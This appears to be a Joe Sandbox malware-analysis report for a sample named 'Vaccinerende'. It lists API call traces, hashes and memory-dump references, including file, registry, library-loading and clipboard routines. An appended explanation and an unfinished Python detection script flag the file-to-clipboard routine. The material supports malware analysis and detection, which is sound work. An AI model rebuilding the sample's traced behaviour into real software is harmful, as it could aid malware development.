                                                                              • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                              • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                              APIs
                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                              • String ID:
                                                                              • API String ID: 2154303073-0
                                                                              • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                              • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                              APIs
                                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 3150196962-0
                                                                              • Opcode ID: a94dde180b5e7858e08a1fdfedeb276c5dc53694cab170f4bca00bd3a8baa0de
                                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                              • Opcode Fuzzy Hash: a94dde180b5e7858e08a1fdfedeb276c5dc53694cab170f4bca00bd3a8baa0de
                                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                              APIs
                                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$PointerRead
                                                                              • String ID:
                                                                              • API String ID: 3154509469-0
                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                              APIs
                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                              • String ID:
                                                                              • API String ID: 4232544981-0
                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              APIs
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 0040A325
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                              APIs
                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                              APIs
                                                                              • EnumResourceNamesW.KERNEL32(?,?,004148B6,00000000), ref: 0041494B
                                                                              APIs
                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                              APIs
                                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                              • Opcode Fuzzy Hash: 4a5c685a9d9bdef1792c919a9c6653d350a9d3b47e85a52724e839495e208d01
                                                                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004095FC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 3655998216-0
                                                                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00445426
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                              • String ID:
                                                                              • API String ID: 1828521557-0
                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                              APIs
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@FilePointermemcpy
                                                                              • String ID:
                                                                              • API String ID: 609303285-0
                                                                              • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                              • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID:
                                                                              • API String ID: 2081463915-0
                                                                              • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                              • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                              APIs
                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                              • String ID:
                                                                              • API String ID: 2136311172-0
                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                              APIs
                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ??2@??3@
                                                                              • String ID:
                                                                              • API String ID: 1936579350-0
                                                                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free
                                                                              • String ID:
                                                                              • API String ID: 1294909896-0
                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free
                                                                              • String ID:
                                                                              • API String ID: 1294909896-0
                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                              APIs
                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                              • CloseClipboard.USER32 ref: 0040997D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                              • String ID:
                                                                              • API String ID: 3604893535-0
                                                                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
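The entry above is the routine at 004098EC that opens a file, reads it into a GlobalAlloc'd buffer and hands that buffer to SetClipboardData with format 0x0D (CF_UNICODETEXT), which is what the "Contains functionality for read data from the clipboard" signature in this report is built on. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling: it parses this per-function listing layout into records, recomputes the report's "API ID" and "String ID" fields by a rule inferred from the entries on this page (CamelCase words longer than three characters, grouped by how often they occur, subcall APIs included) rather than from vendor documentation, and flags any function whose direct call sequence reads a file and then places it on the clipboard as CF_UNICODETEXT. The sample text is constructed from two entries on this page; the record names and the detection rule are the example's own.

```python
"""Parse Joe Sandbox per-function entries (the 'APIs' / 'Memory Dump Source' /
'Similarity' blocks in this report) into records, recompute the API ID and
String ID fields, and flag the read-file-into-clipboard routine at 004098EC.
Added example, not Joe Sandbox code; the API ID rule is inferred from the
entries on this page, not taken from vendor documentation."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

CF_UNICODETEXT = 0x0D  # clipboard format passed to SetClipboardData in the report

# Constructed sample: two entries copied from the report, indentation dropped.
SAMPLE = """\
APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
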